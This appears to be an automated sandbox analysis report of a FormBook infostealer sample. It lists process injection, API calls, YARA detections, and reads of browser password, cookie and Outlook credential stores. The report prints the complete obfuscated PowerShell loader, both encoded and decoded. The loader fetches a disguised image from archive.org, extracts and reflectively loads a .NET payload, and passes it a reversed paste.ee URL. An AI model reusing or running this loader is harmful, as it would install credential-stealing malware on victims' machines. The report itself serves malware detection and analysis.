Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe NtQueryVolumeInformationFile: Direct from: 0x77382F2C Jump to behavior
Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe NtQuerySystemInformation: Direct from: 0x773848CC Jump to behavior
Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe NtReadVirtualMemory: Direct from: 0x77382E8C Jump to behavior
Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe NtCreateKey: Direct from: 0x77382C6C Jump to behavior
Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe NtClose: Direct from: 0x77382B6C
Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe NtAllocateVirtualMemory: Direct from: 0x773848EC Jump to behavior
Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe NtQueryAttributesFile: Direct from: 0x77382E6C Jump to behavior
Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe NtSetInformationThread: Direct from: 0x77382B4C Jump to behavior
Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe NtTerminateThread: Direct from: 0x77382FCC Jump to behavior
Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe NtQueryInformationToken: Direct from: 0x77382CAC Jump to behavior
Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe NtOpenKeyEx: Direct from: 0x77382B9C Jump to behavior
Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe NtAllocateVirtualMemory: Direct from: 0x77382BEC Jump to behavior
Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe NtDeviceIoControlFile: Direct from: 0x77382AEC Jump to behavior
Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe NtCreateFile: Direct from: 0x77382FEC Jump to behavior
Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe NtOpenFile: Direct from: 0x77382DCC Jump to behavior
Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe NtClose: Direct from: 0x77377B2E
Injects a PE file into a foreign processes
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\SysWOW64\appidtel.exe base: 400000 value starts with: 4D5A Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Windows\SysWOW64\appidtel.exe Section loaded: NULL target: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe protection: execute and read and write Jump to behavior
Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe Section loaded: NULL target: C:\Windows\SysWOW64\appidtel.exe protection: execute and read and write Jump to behavior
Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe Section loaded: NULL target: C:\Windows\SysWOW64\dllhost.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\dllhost.exe Section loaded: NULL target: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\dllhost.exe Section loaded: NULL target: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\dllhost.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\dllhost.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\SysWOW64\dllhost.exe Thread register set: target process: 4140 Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Windows\SysWOW64\dllhost.exe Thread APC queued: target process: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe Jump to behavior
Writes to foreign memory regions
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\SysWOW64\appidtel.exe base: 400000 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\SysWOW64\appidtel.exe base: 401000 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\SysWOW64\appidtel.exe base: 8DE008 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJGVudjpjb21zcEVjWzQsMjYsMjVdLUpPSU4nJykoICgoJ3swfWltJysnYWdlVXJsID0gezF9aHR0cHM6Ly9pYTYwMDEwJysnMi51cy5hcmNoaXZlLm9yZy8zMi9pdGUnKydtcy9kZXRhaC1ub3RlLXZfMjAyNDEwL0RlJysndGFoTm90ZScrJ19WLmpwZyB7MX07ezB9d2ViQ2xpZW50ID0gJysnTmV3LU9iaicrJ2VjdCBTeXN0ZW0uTmV0LldlYkNsaScrJ2UnKydudDt7MH1pbWFnZUJ5dGVzID0gezB9d2ViQ2xpZW4nKyd0LkRvd25sb2FkRGF0JysnYSh7MH1pbWFnZVVybCk7ezB9aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZScrJ3RTdHJpbmcoezB9aW1hZ2VCeXRlcyk7ezB9cycrJ3RhcnRGbGFnID0gezF9PDxCQVNFNjRfU1RBUlQ+PnsxfTt7MH1lbmRGbGFnID0gezF9PDxCQVNFJysnNjRfRU5EPj57MX07ezB9c3RhcnRJbmRleCA9IHswfWltYWdlVGV4dC5JbmRleE9mKHswfXN0YXJ0RmxhZyk7ezB9ZW5kSW5kZXggPSB7MH1pbWFnZVRleHQuSW5kZXhPZih7MH1lbmRGbGFnKTt7MH1zdGFydEluZGV4IC1nZSAwIC1hbmQgeycrJzB9ZW5kSW5kZXggLWd0IHswfXN0YXJ0SW5kZXg7ezB9c3RhcnRJbmRleCArPSB7MH1zdGFydEZsYWcuTGVuZ3QnKydoO3swfWJhc2U2NExlbmd0aCA9IHswfWVuZEluZGV4IC0gezB9c3RhcnRJbmRleDt7MH1iYXNlNjRDb21tYW5kID0gezB9aW1hZ2VUZXh0LlN1YnN0cmluZyh7MH1zdGFydEluZGV4LCcrJyB7MH1iYXNlNjRMZW5ndGgpO3swfWNvbW1hbmRCeXRlcyA9IFtTeXN0JysnZW0uQ29udmVydF06OkZybycrJ21CYXNlNjRTdHJpbmcoezB9JysnYmFzZTY0Q29tbWFuZCk7ezB9bG9hJysnZGVkQXNzZW1iJysnbHkgPSAnKydbU3lzdGVtLlJlZmxlY3Rpb24uQScrJ3NzZW1ibHldOjpMb2FkKHswfWNvbW1hbmRCeXRlcyk7ezB9dmFpTWV0aG9kID0gW2RubGliLicrJ0lPLkhvbWUnKyddLkdldE1ldGhvZCh7MX1WQUl7MX0pO3swfXZhaU1ldGhvZC5JbnZva2UoezB9bnVsbCwgQCcrJyh7MX0wL2hCUEZtL2QvZWUuZXRzYXAvLzpzcHR0aHsxfScrJywgezF9ZGVzYXRpdmFkb3sxfSwgezF9ZGVzYXRpdmFkb3sxfSwgezF9ZGVzYXRpdmFkb3sxfSwgezF9ZGVzYXRpdicrJ2Fkb3sxfSwgezF9MXsxfSwgezF9YXBwaWR0ZWx7MScrJ30pKTsnKSAtZiAgW2NIQXJdMzYsW2NIQXJdMzkpKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $env:comspEc[4,26,25]-JOIN'')( (('{0}im'+'ageUrl = {1}https://ia60010'+'2.us.archive.org/32/ite'+'ms/detah-note-v_202410/De'+'tahNote'+'_V.jpg {1};{0}webClient = '+'New-Obj'+'ect System.Net.WebCli'+'e'+'nt;{0}imageBytes = {0}webClien'+'t.DownloadDat'+'a({0}imageUrl);{0}imageText = [System.Text.Encoding]::UTF8.Ge'+'tString({0}imageBytes);{0}s'+'tartFlag = {1}<<BASE64_START>>{1};{0}endFlag = {1}<<BASE'+'64_END>>{1};{0}startIndex = {0}imageText.IndexOf({0}startFlag);{0}endIndex = {0}imageText.IndexOf({0}endFlag);{0}startIndex -ge 0 -and {'+'0}endIndex -gt {0}startIndex;{0}startIndex += {0}startFlag.Lengt'+'h;{0}base64Length = {0}endIndex - {0}startIndex;{0}base64Command = {0}imageText.Substring({0}startIndex,'+' {0}base64Length);{0}commandBytes = [Syst'+'em.Convert]::Fro'+'mBase64String({0}'+'base64Command);{0}loa'+'dedAssemb'+'ly = '+'[System.Reflection.A'+'ssembly]::Load({0}commandBytes);{0}vaiMethod = [dnlib.'+'IO.Home'+'].GetMethod({1}VAI{1});{0}vaiMethod.Invoke({0}null, @'+'({1}0/hBPFm/d/ee.etsap//:sptth{1}'+', {1}desativado{1}, {1}desativado{1}, {1}desativado{1}, {1}desativ'+'ado{1}, {1}1{1}, {1}appidtel{1'+'}));') -f [cHAr]36,[cHAr]39))" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\appidtel.exe "C:\Windows\SysWOW64\appidtel.exe" Jump to behavior
Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe Process created: C:\Windows\SysWOW64\dllhost.exe "C:\Windows\SysWOW64\dllhost.exe" Jump to behavior
Source: C:\Windows\SysWOW64\dllhost.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe" Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'liggjgvudjpjb21zcevjwzqsmjysmjvdluppsu4njykoicgoj3swfwltjysnywdlvxjsid0gezf9ahr0chm6ly9pytywmdewjysnmi51cy5hcmnoaxzllm9yzy8zmi9pdgunkydtcy9kzxrhac1ub3rllxzfmjayndewl0rljysndgfotm90zscrj19wlmpwzyb7mx07ezb9d2viq2xpzw50id0gjysntmv3lu9iaicrj2vjdcbtexn0zw0utmv0lldlyknsascrj2unkyduddt7mh1pbwfnzuj5dgvzid0gezb9d2viq2xpzw4nkyd0lkrvd25sb2fkrgf0jysnysh7mh1pbwfnzvvybck7ezb9aw1hz2vuzxh0id0gw1n5c3rlbs5uzxh0lkvuy29kaw5nxto6vvrgoc5hzscrj3rtdhjpbmcoezb9aw1hz2vcexrlcyk7ezb9cycrj3rhcnrgbgfnid0gezf9pdxcqvnfnjrfu1rbulq+pnsxftt7mh1lbmrgbgfnid0gezf9pdxcqvnfjysnnjrfru5epj57mx07ezb9c3rhcnrjbmrleca9ihswfwltywdlvgv4dc5jbmrlee9mkhswfxn0yxj0rmxhzyk7ezb9zw5ksw5kzxggpsb7mh1pbwfnzvrlehqusw5kzxhpzih7mh1lbmrgbgfnktt7mh1zdgfydeluzgv4ic1nzsawic1hbmqgeycrjzb9zw5ksw5kzxgglwd0ihswfxn0yxj0sw5kzxg7ezb9c3rhcnrjbmrlecarpsb7mh1zdgfydezsywcutgvuz3qnkydoo3swfwjhc2u2nexlbmd0aca9ihswfwvuzeluzgv4ic0gezb9c3rhcnrjbmrledt7mh1iyxnlnjrdb21tyw5kid0gezb9aw1hz2vuzxh0lln1ynn0cmluzyh7mh1zdgfydeluzgv4lccrjyb7mh1iyxnlnjrmzw5ndggpo3swfwnvbw1hbmrcexrlcya9ifttexn0jysnzw0uq29udmvydf06okzybycrj21cyxnlnjrtdhjpbmcoezb9jysnymfzzty0q29tbwfuzck7ezb9bg9hjysnzgvkqxnzzw1ijysnbhkgpsankydbu3lzdgvtlljlzmxly3rpb24uqscrj3nzzw1ibhldojpmb2fkkhswfwnvbw1hbmrcexrlcyk7ezb9dmfptwv0ag9kid0gw2rubglilicrj0lplkhvbwunkyddlkdlde1ldghvzch7mx1wqul7mx0po3swfxzhau1ldghvzc5jbnzva2uoezb9bnvsbcwgqccrjyh7mx0wl2hcueztl2qvzwuuzxrzyxavlzpzchr0ahsxfscrjywgezf9zgvzyxrpdmfkb3sxfswgezf9zgvzyxrpdmfkb3sxfswgezf9zgvzyxrpdmfkb3sxfswgezf9zgvzyxrpdicrj2fkb3sxfswgezf9mxsxfswgezf9yxbwawr0zwx7mscrj30pktsnksatziagw2niqxjdmzysw2niqxjdmzkpkq==';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command ".( $env:comspec[4,26,25]-join'')( (('{0}im'+'ageurl = {1}https://ia60010'+'2.us.archive.org/32/ite'+'ms/detah-note-v_202410/de'+'tahnote'+'_v.jpg {1};{0}webclient = '+'new-obj'+'ect system.net.webcli'+'e'+'nt;{0}imagebytes = {0}webclien'+'t.downloaddat'+'a({0}imageurl);{0}imagetext = [system.text.encoding]::utf8.ge'+'tstring({0}imagebytes);{0}s'+'tartflag = {1}<<base64_start>>{1};{0}endflag = {1}<<base'+'64_end>>{1};{0}startindex = {0}imagetext.indexof({0}startflag);{0}endindex = {0}imagetext.indexof({0}endflag);{0}startindex -ge 0 -and {'+'0}endindex -gt {0}startindex;{0}startindex += {0}startflag.lengt'+'h;{0}base64length = {0}endindex - {0}startindex;{0}base64command = {0}imagetext.substring({0}startindex,'+' {0}base64length);{0}commandbytes = [syst'+'em.convert]::fro'+'mbase64string({0}'+'base64command);{0}loa'+'dedassemb'+'ly = '+'[system.reflection.a'+'ssembly]::load({0}commandbytes);{0}vaimethod = [dnlib.'+'io.home'+'].getmethod({1}vai{1});{0}vaimethod.invoke({0}null, @'+'({1}0/hbpfm/d/ee.etsap//:sptth{1}'+', {1}desativado{1}, {1}desativado{1}, {1}desativado{1}, {1}desativ'+'ado{1}, {1}1{1}, {1}appidtel{1'+'}));') -f [char]36,[char]39))"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'liggjgvudjpjb21zcevjwzqsmjysmjvdluppsu4njykoicgoj3swfwltjysnywdlvxjsid0gezf9ahr0chm6ly9pytywmdewjysnmi51cy5hcmnoaxzllm9yzy8zmi9pdgunkydtcy9kzxrhac1ub3rllxzfmjayndewl0rljysndgfotm90zscrj19wlmpwzyb7mx07ezb9d2viq2xpzw50id0gjysntmv3lu9iaicrj2vjdcbtexn0zw0utmv0lldlyknsascrj2unkyduddt7mh1pbwfnzuj5dgvzid0gezb9d2viq2xpzw4nkyd0lkrvd25sb2fkrgf0jysnysh7mh1pbwfnzvvybck7ezb9aw1hz2vuzxh0id0gw1n5c3rlbs5uzxh0lkvuy29kaw5nxto6vvrgoc5hzscrj3rtdhjpbmcoezb9aw1hz2vcexrlcyk7ezb9cycrj3rhcnrgbgfnid0gezf9pdxcqvnfnjrfu1rbulq+pnsxftt7mh1lbmrgbgfnid0gezf9pdxcqvnfjysnnjrfru5epj57mx07ezb9c3rhcnrjbmrleca9ihswfwltywdlvgv4dc5jbmrlee9mkhswfxn0yxj0rmxhzyk7ezb9zw5ksw5kzxggpsb7mh1pbwfnzvrlehqusw5kzxhpzih7mh1lbmrgbgfnktt7mh1zdgfydeluzgv4ic1nzsawic1hbmqgeycrjzb9zw5ksw5kzxgglwd0ihswfxn0yxj0sw5kzxg7ezb9c3rhcnrjbmrlecarpsb7mh1zdgfydezsywcutgvuz3qnkydoo3swfwjhc2u2nexlbmd0aca9ihswfwvuzeluzgv4ic0gezb9c3rhcnrjbmrledt7mh1iyxnlnjrdb21tyw5kid0gezb9aw1hz2vuzxh0lln1ynn0cmluzyh7mh1zdgfydeluzgv4lccrjyb7mh1iyxnlnjrmzw5ndggpo3swfwnvbw1hbmrcexrlcya9ifttexn0jysnzw0uq29udmvydf06okzybycrj21cyxnlnjrtdhjpbmcoezb9jysnymfzzty0q29tbwfuzck7ezb9bg9hjysnzgvkqxnzzw1ijysnbhkgpsankydbu3lzdgvtlljlzmxly3rpb24uqscrj3nzzw1ibhldojpmb2fkkhswfwnvbw1hbmrcexrlcyk7ezb9dmfptwv0ag9kid0gw2rubglilicrj0lplkhvbwunkyddlkdlde1ldghvzch7mx1wqul7mx0po3swfxzhau1ldghvzc5jbnzva2uoezb9bnvsbcwgqccrjyh7mx0wl2hcueztl2qvzwuuzxrzyxavlzpzchr0ahsxfscrjywgezf9zgvzyxrpdmfkb3sxfswgezf9zgvzyxrpdmfkb3sxfswgezf9zgvzyxrpdmfkb3sxfswgezf9zgvzyxrpdicrj2fkb3sxfswgezf9mxsxfswgezf9yxbwawr0zwx7mscrj30pktsnksatziagw2niqxjdmzysw2niqxjdmzkpkq==';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command ".( $env:comspec[4,26,25]-join'')( (('{0}im'+'ageurl = {1}https://ia60010'+'2.us.archive.org/32/ite'+'ms/detah-note-v_202410/de'+'tahnote'+'_v.jpg {1};{0}webclient = '+'new-obj'+'ect system.net.webcli'+'e'+'nt;{0}imagebytes = {0}webclien'+'t.downloaddat'+'a({0}imageurl);{0}imagetext = [system.text.encoding]::utf8.ge'+'tstring({0}imagebytes);{0}s'+'tartflag = {1}<<base64_start>>{1};{0}endflag = {1}<<base'+'64_end>>{1};{0}startindex = {0}imagetext.indexof({0}startflag);{0}endindex = {0}imagetext.indexof({0}endflag);{0}startindex -ge 0 -and {'+'0}endindex -gt {0}startindex;{0}startindex += {0}startflag.lengt'+'h;{0}base64length = {0}endindex - {0}startindex;{0}base64command = {0}imagetext.substring({0}startindex,'+' {0}base64length);{0}commandbytes = [syst'+'em.convert]::fro'+'mbase64string({0}'+'base64command);{0}loa'+'dedassemb'+'ly = '+'[system.reflection.a'+'ssembly]::load({0}commandbytes);{0}vaimethod = [dnlib.'+'io.home'+'].getmethod({1}vai{1});{0}vaimethod.invoke({0}null, @'+'({1}0/hbpfm/d/ee.etsap//:sptth{1}'+', {1}desativado{1}, {1}desativado{1}, {1}desativado{1}, {1}desativ'+'ado{1}, {1}1{1}, {1}appidtel{1'+'}));') -f [char]36,[char]39))" Jump to behavior
Source: QEwzeZKCXN.exe, 0000000A.00000000.2668374645.0000000001720000.00000002.00000001.00040000.00000000.sdmp, QEwzeZKCXN.exe, 0000000A.00000002.3411139115.0000000001720000.00000002.00000001.00040000.00000000.sdmp, QEwzeZKCXN.exe, 0000000C.00000002.3411473122.00000000016C0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: IProgram Manager
Source: QEwzeZKCXN.exe, 0000000A.00000000.2668374645.0000000001720000.00000002.00000001.00040000.00000000.sdmp, QEwzeZKCXN.exe, 0000000A.00000002.3411139115.0000000001720000.00000002.00000001.00040000.00000000.sdmp, QEwzeZKCXN.exe, 0000000C.00000002.3411473122.00000000016C0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: QEwzeZKCXN.exe, 0000000A.00000000.2668374645.0000000001720000.00000002.00000001.00040000.00000000.sdmp, QEwzeZKCXN.exe, 0000000A.00000002.3411139115.0000000001720000.00000002.00000001.00040000.00000000.sdmp, QEwzeZKCXN.exe, 0000000C.00000002.3411473122.00000000016C0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: QEwzeZKCXN.exe, 0000000A.00000000.2668374645.0000000001720000.00000002.00000001.00040000.00000000.sdmp, QEwzeZKCXN.exe, 0000000A.00000002.3411139115.0000000001720000.00000002.00000001.00040000.00000000.sdmp, QEwzeZKCXN.exe, 0000000C.00000002.3411473122.00000000016C0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected FormBook
Source: Yara match File source: 5.2.appidtel.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.appidtel.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.2743518891.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.3411918505.0000000003580000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2744370490.0000000003750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.3413713122.00000000053E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.3409933313.0000000003330000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2743702515.0000000000B20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.3409365866.0000000003080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.3412088432.0000000002DF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\SysWOW64\dllhost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\dllhost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\dllhost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State Jump to behavior
Source: C:\Windows\SysWOW64\dllhost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Windows\SysWOW64\dllhost.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\dllhost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\dllhost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State Jump to behavior
Source: C:\Windows\SysWOW64\dllhost.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Windows\SysWOW64\dllhost.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ Jump to behavior

Remote Access Functionality
barindex
Yara detected FormBook
Source: Yara match File source: 5.2.appidtel.exe.400000.0.unpack, type: UNPACKEDPE
